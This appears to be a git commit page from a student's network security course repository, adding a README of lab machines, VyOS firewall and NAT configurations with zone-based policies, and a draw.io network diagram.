lotte/ChamplainTechJournals
1
Code Activity

migrate to git.charlotte.sh

Browse source
This commit is contained in:
Charlotte Croce 2025-04-19 23:42:08 -04:00
commit fbd588721e
412 changed files with 13750 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

24
net-sec-controls-sec350/README.md Normal file
View file

@ -0,0 +1,24 @@
# Network Security Controls
| Machine | IP Address | Default Gateway | DNS Server | Network | Description |
|----------|------------|----------------|------------|-----------|----------|
| [fw01](machines/FW01.md) | eth0: 10.0.17.151/24<br>eth1: 172.16.50.2/29<br>eth2: 172.16.150.2/24 | 10.0.17.2 | 10.0.17.2 | WAN/DMZ/LAN | VyOS router for all networks |
| [edge01](machines/EDGE01.md) | eth0: 10.0.17.151/24<br>eth1: 172.16.50.2/29<br>eth2: 172.16.150.2/24 | 10.0.17.2 | 10.0.17.2 | WAN/DMZ/LAN | Assessment VyOS router |
| [fw-mgmt](machines/FW-MGMT.md) | eth0: 172.16.150.3/24<br>eth1: 172.16.200.2/28 | 172.16.150.2 | 172.16.150.2 | LAN/MGMT | VyOS for LAN/MGMT |
| [web01](machines/WEB01.md) | 172.16.50.3/29 | 172.16.50.2 | 172.16.50.2 | DMZ | CentOS Apache server |
| [nginx01](machines/NGINX01.md) | 172.16.50.3/29 | 172.16.50.2 | 172.16.50.2 | DMZ | Ubuntu NGINX server |
| [log01](machines/LOG01.md) | 172.16.50.5/29 | 172.16.50.2 | 172.16.50.2 | DMZ | CentOS log server |
| [jump](machines/LOG01.md#recommissioned-as-jump-server) | 172.16.50.4/29 | 172.16.50.2 | 172.16.50.2 | DMZ | SSH jump host |
| [wazuh](machines/WAZUH.md) | 172.16.200.10/28 | 172.16.200.2 | 172.16.200.2 | MGMT | Wazuh SIEM server |
| [mgmt01](machines/MGMT01.md) | 172.16.150.10/24 | 172.16.150.2 | 172.16.150.2 | LAN | Ubuntu admin station |
| [mgmt02](machines/MGMT02.md) | 172.16.200.11/28 | 172.16.200.2 | 172.16.200.2 | MGMT | Windows admin server |
| [wks01](machines/WKS01.md) | 172.16.150.50/24 | 172.16.150.2 | 172.16.150.2 | LAN | Windows workstation |
| [rw01](machines/RW01.md) | 10.0.17.51/24 | 10.0.17.2 | 10.0.17.2 | WAN | Ubuntu road warrior |
| [traveler](machines/TRAVELER.md) | 10.0.17.51/24 | 10.0.17.2 | 10.0.17.2 | WAN | Windows road warrior |
| [dhcp01](machines/DHCP01.md) | 172.16.150.151/24 | 172.16.150.2 | 172.16.150.2 | LAN | Ubuntu DHCP server |
*Note: fw01 was replaced by edge01, web01 was replaced by nginx01, log01 was repurposed as jump, and rw01 was replaced by traveler*
## Network Diagram - Before Midterm
![Diagram before midterm](https://git.charlotte.sh/lotte/ChamplainTechJournals/src/branch/main/net-sec-controls-sec350/diagrams/SEC350_network-diagram-beforemidterm.drawio.png?raw=true "Network Diagram")

103
net-sec-controls-sec350/configs/edge02/edge02.config.assessment.txt Normal file
View file

@ -0,0 +1,103 @@
set firewall name DMZ-to-LAN default-action 'drop'
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action 'accept'
set firewall name DMZ-to-LAN rule 1 state established 'enable'
set firewall name DMZ-to-LAN rule 10 action 'accept'
set firewall name DMZ-to-LAN rule 10 description 'wazuh agent communication with server'
set firewall name DMZ-to-LAN rule 10 destination address '172.16.200.10'
set firewall name DMZ-to-LAN rule 10 destination port '1514,1515'
set firewall name DMZ-to-LAN rule 10 protocol 'tcp'
set firewall name DMZ-to-WAN default-action 'drop'
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action 'accept'
set firewall name DMZ-to-WAN rule 1 state established 'enable'
set firewall name DMZ-to-WAN rule 10 action 'accept'
set firewall name DMZ-to-WAN rule 10 description 'NGINX->WAN'
set firewall name DMZ-to-WAN rule 10 source address '172.16.50.3'
set firewall name LAN-to-DMZ default-action 'drop'
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action 'accept'
set firewall name LAN-to-DMZ rule 1 state established 'enable'
set firewall name LAN-to-DMZ rule 10 action 'accept'
set firewall name LAN-to-DMZ rule 10 description 'Allow HTTP from LAN to DMZ'
set firewall name LAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name LAN-to-DMZ rule 10 destination port '80'
set firewall name LAN-to-DMZ rule 10 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 action 'accept'
set firewall name LAN-to-DMZ rule 20 description 'Allow SSH from MGMT-01 to DMZ'
set firewall name LAN-to-DMZ rule 20 destination port '22'
set firewall name LAN-to-DMZ rule 20 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 source address '172.16.150.10'
set firewall name LAN-to-WAN default-action 'drop'
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action 'accept'
set firewall name WAN-to-DMZ default-action 'drop'
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 1 action 'accept'
set firewall name WAN-to-DMZ rule 1 state established 'enable'
set firewall name WAN-to-DMZ rule 10 action 'accept'
set firewall name WAN-to-DMZ rule 10 description 'allow HTTP from WAN to DMZ'
set firewall name WAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name WAN-to-DMZ rule 10 destination port '80'
set firewall name WAN-to-DMZ rule 10 protocol 'tcp'
set firewall name WAN-to-DMZ rule 20 action 'accept'
set firewall name WAN-to-DMZ rule 20 description 'SSH to JUMP'
set firewall name WAN-to-DMZ rule 20 destination address '172.16.50.4'
set firewall name WAN-to-DMZ rule 20 destination port '22'
set firewall name WAN-to-DMZ rule 20 protocol 'tcp'
set firewall name WAN-to-LAN default-action 'drop'
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action 'accept'
set firewall name WAN-to-LAN rule 1 state established 'enable'
set interfaces ethernet eth0 address '10.0.17.151/24'
set interfaces ethernet eth0 description 'SEC350-WAN'
set interfaces ethernet eth1 address '172.16.50.2/29'
set interfaces ethernet eth1 description 'CHARLOTTE-DMZ'
set interfaces ethernet eth2 address '172.16.150.2/24'
set interfaces ethernet eth2 description 'CHARLOTTE-LAN'
set nat destination rule 10 description 'HTTP->NGINX01'
set nat destination rule 10 destination port '80'
set nat destination rule 10 inbound-interface 'eth0'
set nat destination rule 10 protocol 'tcp'
set nat destination rule 10 translation address '172.16.50.3'
set nat destination rule 20 description 'SSH->JUMP'
set nat destination rule 20 destination port '22'
set nat destination rule 20 inbound-interface 'eth0'
set nat destination rule 20 protocol 'tcp'
set nat destination rule 20 translation address '172.16.50.4'
set nat source rule 10 description 'NAT FROM DMZ to WAN'
set nat source rule 10 outbound-interface 'eth0'
set nat source rule 10 source address '172.16.50.0/29'
set nat source rule 10 translation address 'masquerade'
set nat source rule 20 description 'NAT FROM LAN to WAN'
set nat source rule 20 outbound-interface 'eth0'
set nat source rule 20 source address '172.16.150.0/24'
set nat source rule 20 translation address 'masquerade'
set nat source rule 30 description 'NAT FROM MGMT to WAN'
set nat source rule 30 outbound-interface 'eth0'
set nat source rule 30 source address '172.16.200.0/28'
set nat source rule 30 translation address 'masquerade'
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set service dhcp-relay interface 'eth0'
set service dhcp-relay interface 'eth2'
set service dhcp-relay server '172.16.150.151'
set service dns forwarding allow-from '172.16.150.0/24'
set service dns forwarding allow-from '172.16.50.0/29'
set service dns forwarding listen-address '172.16.150.2'
set service dns forwarding listen-address '172.16.50.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set service ssh listen-address '172.16.150.2'
set system host-name 'edge02-charlotte'
set system name-server '10.0.17.2'
set zone-policy zone DMZ from LAN firewall name 'LAN-to-DMZ'
set zone-policy zone DMZ from WAN firewall name 'WAN-to-DMZ'
set zone-policy zone DMZ interface 'eth1'
set zone-policy zone LAN from DMZ firewall name 'DMZ-to-LAN'
set zone-policy zone LAN from WAN firewall name 'WAN-to-LAN'
set zone-policy zone LAN interface 'eth2'
set zone-policy zone WAN from DMZ firewall name 'DMZ-to-WAN'
set zone-policy zone WAN from LAN firewall name 'LAN-to-WAN'
set zone-policy zone WAN interface 'eth0'

13
net-sec-controls-sec350/configs/fw-mgmt/fw-mgmt.config.week03.txt Normal file
View file

@ -0,0 +1,13 @@
set interfaces ethernet eth0 address '172.16.150.3/24'
set interfaces ethernet eth0 description 'LAN'
set interfaces ethernet eth1 address '172.16.200.2/28'
set interfaces ethernet eth1 description 'MGMT'
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
set protocols static route 0.0.0.0/0 next-hop 172.16.150.2
set service dns forwarding allow-from '172.16.200.0/28'
set service dns forwarding listen-address '172.16.200.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw-mgmt-charlotte'
set system name-server '172.16.150.2'

49
net-sec-controls-sec350/configs/fw-mgmt/fw-mgmt.config.week04.txt Normal file
View file

@ -0,0 +1,49 @@
set firewall name LAN-to-MGMT default-action 'drop'
set firewall name LAN-to-MGMT enable-default-log
set firewall name LAN-to-MGMT rule 1 action 'accept'
set firewall name LAN-to-MGMT rule 1 state established 'enable'
set firewall name LAN-to-MGMT rule 10 action 'accept'
set firewall name LAN-to-MGMT rule 10 description 'wazuh SSH access from MGMT-01'
set firewall name LAN-to-MGMT rule 10 destination address '172.16.200.10'
set firewall name LAN-to-MGMT rule 10 destination port '22'
set firewall name LAN-to-MGMT rule 10 protocol 'tcp'
set firewall name LAN-to-MGMT rule 10 source address '172.16.150.10'
set firewall name LAN-to-MGMT rule 20 action 'accept'
set firewall name LAN-to-MGMT rule 20 description 'wazuh HTTPS access from MGMT-01'
set firewall name LAN-to-MGMT rule 20 destination address '172.16.200.10'
set firewall name LAN-to-MGMT rule 20 destination port '443'
set firewall name LAN-to-MGMT rule 20 protocol 'tcp'
set firewall name LAN-to-MGMT rule 20 source address '172.16.150.10'
set firewall name LAN-to-MGMT rule 30 action 'accept'
set firewall name LAN-to-MGMT rule 30 description 'wazuh agent communication with server'
set firewall name LAN-to-MGMT rule 30 destination address '172.16.200.10'
set firewall name LAN-to-MGMT rule 30 destination port '1514,1515'
set firewall name LAN-to-MGMT rule 30 protocol 'tcp'
set firewall name MGMT-to-LAN default-action 'drop'
set firewall name MGMT-to-LAN enable-default-log
set firewall name MGMT-to-LAN rule 1 action 'accept'
set firewall name MGMT-to-LAN rule 1 state established 'enable'
set firewall name MGMT-to-LAN rule 10 action 'accept'
set firewall name MGMT-to-LAN rule 10 description 'allows MGMT to LAN'
set firewall name MGMT-to-LAN rule 10 destination address '172.16.150.0/24'
set firewall name MGMT-to-LAN rule 20 action 'accept'
set firewall name MGMT-to-LAN rule 20 description 'allows MGMT to DMZ'
set firewall name MGMT-to-LAN rule 20 destination address '172.16.50.0/29'
set interfaces ethernet eth0 address '172.16.150.3/24'
set interfaces ethernet eth0 description 'LAN'
set interfaces ethernet eth1 address '172.16.200.2/28'
set interfaces ethernet eth1 description 'MGMT'
set nat source
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
set protocols static route 0.0.0.0/0 next-hop 172.16.150.2
set service dns forwarding allow-from '172.16.200.0/28'
set service dns forwarding listen-address '172.16.200.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw-mgmt-charlotte'
set system name-server '172.16.150.2'
set zone-policy zone LAN from MGMT firewall name 'MGMT-to-LAN'
set zone-policy zone LAN interface 'eth0'
set zone-policy zone MGMT from LAN firewall name 'LAN-to-MGMT'
set zone-policy zone MGMT interface 'eth1'

29
net-sec-controls-sec350/configs/fw01/fw01.config.week03.txt Normal file
View file

@ -0,0 +1,29 @@
set interfaces ethernet eth0 address '10.0.17.151/24'
set interfaces ethernet eth0 description 'SEC350-WAN'
set interfaces ethernet eth1 address '172.16.50.2/29'
set interfaces ethernet eth1 description 'CHARLOTTE-DMZ'
set interfaces ethernet eth2 address '172.16.150.2/24'
set interfaces ethernet eth2 description 'CHARLOTTE-LAN'
set nat source rule 10 description 'NAT FROM DMZ to WAN'
set nat source rule 10 outbound-interface 'eth0'
set nat source rule 10 source address '172.16.50.0/29'
set nat source rule 10 translation address 'masquerade'
set nat source rule 20 description 'NAT from LAN to WAN'
set nat source rule 20 outbound-interface 'eth0'
set nat source rule 20 source address '172.16.150.0/24'
set nat source rule 20 translation address 'masquerade'
set nat source rule 30 description 'NAT from MGMT to LAN'
set nat source rule 30 outbound-interface 'eth0'
set nat source rule 30 source address '172.16.200.0/28'
set nat source rule 30 translation address 'masquerade'
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set service dns forwarding allow-from '172.16.50.0/29'
set service dns forwarding allow-from '172.16.150.0/24'
set service dns forwarding listen-address '172.16.50.2'
set service dns forwarding listen-address '172.16.150.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw01-charlotte'
set system name-server '10.0.17.2'

79
net-sec-controls-sec350/configs/fw01/fw01.config.week04.txt Normal file
View file

@ -0,0 +1,79 @@
set firewall name DMZ-to-LAN default-action 'drop'
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action 'accept'
set firewall name DMZ-to-LAN rule 1 state established 'enable'
set firewall name DMZ-to-LAN rule 10 action 'accept'
set firewall name DMZ-to-LAN rule 10 description 'wazuh agent communication with server'
set firewall name DMZ-to-LAN rule 10 destination address '172.16.200.10'
set firewall name DMZ-to-LAN rule 10 destination port '1514,1515'
set firewall name DMZ-to-LAN rule 10 protocol 'tcp'
set firewall name DMZ-to-WAN default-action 'drop'
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action 'accept'
set firewall name DMZ-to-WAN rule 1 state established 'enable'
set firewall name LAN-to-DMZ default-action 'drop'
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action 'accept'
set firewall name LAN-to-DMZ rule 1 state established 'enable'
set firewall name LAN-to-DMZ rule 10 action 'accept'
set firewall name LAN-to-DMZ rule 10 description 'Allow HTTP from LAN to DMZ'
set firewall name LAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name LAN-to-DMZ rule 10 destination port '80'
set firewall name LAN-to-DMZ rule 10 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 action 'accept'
set firewall name LAN-to-DMZ rule 20 description 'Allow SSH from MGMT-01 to DMZ'
set firewall name LAN-to-DMZ rule 20 destination port '22'
set firewall name LAN-to-DMZ rule 20 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 source address '172.16.150.10'
set firewall name LAN-to-WAN default-action 'drop'
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action 'accept'
set firewall name WAN-to-DMZ default-action 'drop'
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 10 action 'accept'
set firewall name WAN-to-DMZ rule 10 description 'allow HTTP from WAN to DMZ'
set firewall name WAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name WAN-to-DMZ rule 10 destination port '80'
set firewall name WAN-to-DMZ rule 10 protocol 'tcp'
set firewall name WAN-to-LAN default-action 'drop'
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action 'accept'
set firewall name WAN-to-LAN rule 1 state established 'enable'
set interfaces ethernet eth0 address '10.0.17.151/24'
set interfaces ethernet eth0 description 'SEC350-WAN'
set interfaces ethernet eth1 address '172.16.50.2/29'
set interfaces ethernet eth1 description 'CHARLOTTE-DMZ'
set interfaces ethernet eth2 address '172.16.150.2/24'
set interfaces ethernet eth2 description 'CHARLOTTE-LAN'
set nat source rule 10 description 'NAT FROM DMZ to WAN'
set nat source rule 10 outbound-interface 'eth0'
set nat source rule 10 source address '172.16.50.0/29'
set nat source rule 10 translation address 'masquerade'
set nat source rule 20 description 'NAT from LAN to WAN'
set nat source rule 20 outbound-interface 'eth0'
set nat source rule 20 source address '172.16.150.0/24'
set nat source rule 20 translation address 'masquerade'
set nat source rule 30 description 'NAT from MGMT to LAN'
set nat source rule 30 outbound-interface 'eth0'
set nat source rule 30 source address '172.16.200.0/28'
set nat source rule 30 translation address 'masquerade'
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set service dns forwarding allow-from '172.16.50.0/29'
set service dns forwarding allow-from '172.16.150.0/24'
set service dns forwarding listen-address '172.16.50.2'
set service dns forwarding listen-address '172.16.150.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw01-charlotte'
set system name-server '10.0.17.2'
set zone-policy zone DMZ from LAN firewall name 'LAN-to-DMZ'
set zone-policy zone DMZ from WAN firewall name 'WAN-to-DMZ'
set zone-policy zone DMZ interface 'eth1'
set zone-policy zone LAN from DMZ firewall name 'DMZ-to-LAN'
set zone-policy zone LAN from WAN firewall name 'WAN-to-LAN'
set zone-policy zone LAN interface 'eth2'
set zone-policy zone WAN from DMZ firewall name 'DMZ-to-WAN'
set zone-policy zone WAN from LAN firewall name 'LAN-to-WAN'
set zone-policy zone WAN interface 'eth0'

81
net-sec-controls-sec350/configs/fw01/fw01.config.week05.txt Normal file
View file

@ -0,0 +1,81 @@
set firewall name DMZ-to-LAN default-action 'drop'
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action 'accept'
set firewall name DMZ-to-LAN rule 1 state established 'enable'
set firewall name DMZ-to-LAN rule 10 action 'accept'
set firewall name DMZ-to-LAN rule 10 description 'wazuh agent communication with server'
set firewall name DMZ-to-LAN rule 10 destination address '172.16.200.10'
set firewall name DMZ-to-LAN rule 10 destination port '1514,1515'
set firewall name DMZ-to-LAN rule 10 protocol 'tcp'
set firewall name DMZ-to-WAN default-action 'drop'
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action 'accept'
set firewall name DMZ-to-WAN rule 1 state established 'enable'
set firewall name LAN-to-DMZ default-action 'drop'
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action 'accept'
set firewall name LAN-to-DMZ rule 1 state established 'enable'
set firewall name LAN-to-DMZ rule 10 action 'accept'
set firewall name LAN-to-DMZ rule 10 description 'Allow HTTP from LAN to DMZ'
set firewall name LAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name LAN-to-DMZ rule 10 destination port '80'
set firewall name LAN-to-DMZ rule 10 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 action 'accept'
set firewall name LAN-to-DMZ rule 20 description 'Allow SSH from MGMT-01 to DMZ'
set firewall name LAN-to-DMZ rule 20 destination port '22'
set firewall name LAN-to-DMZ rule 20 protocol 'tcp'
set firewall name LAN-to-DMZ rule 20 source address '172.16.150.10'
set firewall name LAN-to-WAN default-action 'drop'
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action 'accept'
set firewall name WAN-to-DMZ default-action 'drop'
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 1 action 'accept'
set firewall name WAN-to-DMZ rule 1 state established 'enable'
set firewall name WAN-to-DMZ rule 10 action 'accept'
set firewall name WAN-to-DMZ rule 10 description 'allow HTTP from WAN to DMZ'
set firewall name WAN-to-DMZ rule 10 destination address '172.16.50.3'
set firewall name WAN-to-DMZ rule 10 destination port '80'
set firewall name WAN-to-DMZ rule 10 protocol 'tcp'
set firewall name WAN-to-LAN default-action 'drop'
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action 'accept'
set firewall name WAN-to-LAN rule 1 state established 'enable'
set interfaces ethernet eth0 address '10.0.17.151/24'
set interfaces ethernet eth0 description 'SEC350-WAN'
set interfaces ethernet eth1 address '172.16.50.2/29'
set interfaces ethernet eth1 description 'CHARLOTTE-DMZ'
set interfaces ethernet eth2 address '172.16.150.2/24'
set interfaces ethernet eth2 description 'CHARLOTTE-LAN'
set nat source rule 10 description 'NAT FROM DMZ to WAN'
set nat source rule 10 outbound-interface 'eth0'
set nat source rule 10 source address '172.16.50.0/29'
set nat source rule 10 translation address 'masquerade'
set nat source rule 20 description 'NAT from LAN to WAN'
set nat source rule 20 outbound-interface 'eth0'
set nat source rule 20 source address '172.16.150.0/24'
set nat source rule 20 translation address 'masquerade'
set nat source rule 30 description 'NAT from MGMT to LAN'
set nat source rule 30 outbound-interface 'eth0'
set nat source rule 30 source address '172.16.200.0/28'
set nat source rule 30 translation address 'masquerade'
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set service dns forwarding allow-from '172.16.50.0/29'
set service dns forwarding allow-from '172.16.150.0/24'
set service dns forwarding listen-address '172.16.50.2'
set service dns forwarding listen-address '172.16.150.2'
set service dns forwarding system
set service ssh listen-address '0.0.0.0'
set system host-name 'fw01-charlotte'
set system name-server '10.0.17.2'
set zone-policy zone DMZ from LAN firewall name 'LAN-to-DMZ'
set zone-policy zone DMZ from WAN firewall name 'WAN-to-DMZ'
set zone-policy zone DMZ interface 'eth1'
set zone-policy zone LAN from DMZ firewall name 'DMZ-to-LAN'
set zone-policy zone LAN from WAN firewall name 'WAN-to-LAN'
set zone-policy zone LAN interface 'eth2'
set zone-policy zone WAN from DMZ firewall name 'DMZ-to-WAN'
set zone-policy zone WAN from LAN firewall name 'LAN-to-WAN'
set zone-policy zone WAN interface 'eth0'

297
net-sec-controls-sec350/diagrams/SEC350_network-diagram-aftermidterm.drawio Normal file
View file

@ -0,0 +1,297 @@
<mxfile host="app.diagrams.net" agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" version="26.1.1">
<diagram name="Page-1" id="OsbpnMVMir5d5On4mEyH">
<mxGraphModel dx="1615" dy="878" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="850" pageHeight="1100" math="0" shadow="0">
<root>
<mxCell id="0" />
<mxCell id="1" parent="0" />
<mxCell id="r5Bo3zyKJavz-clfbByA-1" value="SEC-350 WAN 10.0.17.0/24" style="rounded=1;whiteSpace=wrap;html=1;align=center;" vertex="1" parent="1">
<mxGeometry x="560" y="380" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-2" value="LAN 172.16.150.0/24" style="rounded=1;whiteSpace=wrap;html=1;align=center;" vertex="1" parent="1">
<mxGeometry x="770" y="620" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-3" value="DMZ 172.16.50.0/29" style="rounded=1;whiteSpace=wrap;html=1;align=center;" vertex="1" parent="1">
<mxGeometry x="160" y="610" width="340" height="40" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-4" value="EDGE01" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.router;fillColor=#F58534;gradientColor=none;" vertex="1" parent="1">
<mxGeometry x="610" y="502.6" width="69" height="72" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-5" value="" style="endArrow=none;html=1;rounded=0;entryX=0.855;entryY=0.855;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.104;exitY=0;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-2" target="r5Bo3zyKJavz-clfbByA-4">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="921" y="710" as="sourcePoint" />
<mxPoint x="971" y="660" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-6" value="172.16.150.2&lt;div&gt;eth2&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=0;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-5">
<mxGeometry x="0.002" y="2" relative="1" as="geometry">
<mxPoint x="-6" y="-14" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-7" value="" style="endArrow=none;html=1;rounded=0;entryX=0.145;entryY=0.855;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.829;exitY=-0.05;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-3" target="r5Bo3zyKJavz-clfbByA-4">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="491" y="560" as="sourcePoint" />
<mxPoint x="541" y="510" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-8" value="172.16.50.2&lt;div&gt;eth1&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=0;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-7">
<mxGeometry x="0.4" y="-1" relative="1" as="geometry">
<mxPoint x="-17" y="6" as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-9" value="LOG01 (DECOMMISSIONED,&amp;nbsp;&lt;div&gt;THEN RECOMMISSIONED AS A&amp;nbsp;&lt;/div&gt;&lt;div&gt;JUMP SERVER)&lt;br&gt;&lt;div&gt;172.16.50.5&lt;/div&gt;&lt;/div&gt;" style="outlineConnect=0;dashed=0;verticalLabelPosition=bottom;verticalAlign=top;align=center;html=1;shape=mxgraph.aws3.traditional_server;fillColor=#7D7C7C;gradientColor=none;" vertex="1" parent="1">
<mxGeometry x="407" y="693" width="35.5" height="53" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-10" value="" style="endArrow=none;html=1;rounded=0;exitX=0.153;exitY=0.975;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-3">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="481" y="850" as="sourcePoint" />
<mxPoint x="210" y="690" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-11" value="" style="endArrow=none;html=1;rounded=0;entryX=0.5;entryY=0;entryDx=0;entryDy=0;entryPerimeter=0;exitX=0.432;exitY=1.047;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-1" target="r5Bo3zyKJavz-clfbByA-4">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="805" y="530" as="sourcePoint" />
<mxPoint x="855" y="480" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-12" value="10.0.17.151&lt;div&gt;eth0&lt;/div&gt;" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-11">
<mxGeometry x="0.4517" y="1" relative="1" as="geometry">
<mxPoint as="offset" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-13" value="esxi02-fw1" style="image;html=1;image=img/lib/clip_art/networking/Firewall_02_128x128.png" vertex="1" parent="1">
<mxGeometry x="466.01" y="170" width="80" height="80" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-14" value="&lt;div&gt;&lt;br&gt;&lt;/div&gt;" style="shape=umlActor;verticalLabelPosition=bottom;verticalAlign=top;html=1;outlineConnect=0;" vertex="1" parent="1">
<mxGeometry x="190" y="210" width="50" height="80" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-15" value="" style="endArrow=none;html=1;rounded=0;exitX=0;exitY=0.5;exitDx=0;exitDy=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-56" target="r5Bo3zyKJavz-clfbByA-14">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="460" y="390" as="sourcePoint" />
<mxPoint x="510" y="340" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-16" value="sec350.cyber.local&lt;div&gt;10.0.17.100&lt;/div&gt;" style="image;points=[];aspect=fixed;html=1;align=center;shadow=0;dashed=0;image=img/lib/allied_telesis/computer_and_terminals/Server_Desktop.svg;" vertex="1" parent="1">
<mxGeometry x="443.99" y="364" width="56.01" height="71" as="geometry" />
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-17" value="" style="endArrow=none;html=1;rounded=0;entryX=0;entryY=1;entryDx=0;entryDy=0;exitX=0.417;exitY=0.031;exitDx=0;exitDy=0;exitPerimeter=0;" edge="1" parent="1" source="r5Bo3zyKJavz-clfbByA-16" target="r5Bo3zyKJavz-clfbByA-13">
<mxGeometry width="50" height="50" relative="1" as="geometry">
<mxPoint x="620" y="470" as="sourcePoint" />
<mxPoint x="670" y="420" as="targetPoint" />
</mxGeometry>
</mxCell>
<mxCell id="r5Bo3zyKJavz-clfbByA-18" value="port forwarding" style="edgeLabel;html=1;align=center;verticalAlign=middle;resizable=0;points=[];rotation=90;" vertex="1" connectable="0" parent="r5Bo3zyKJavz-clfbByA-17">
<mxGeometry x="-0.27" y="1" relative="1" as="geometry">
<mxPoint x="-7" as="offset" />
</mxGeometry>
</mxCell>
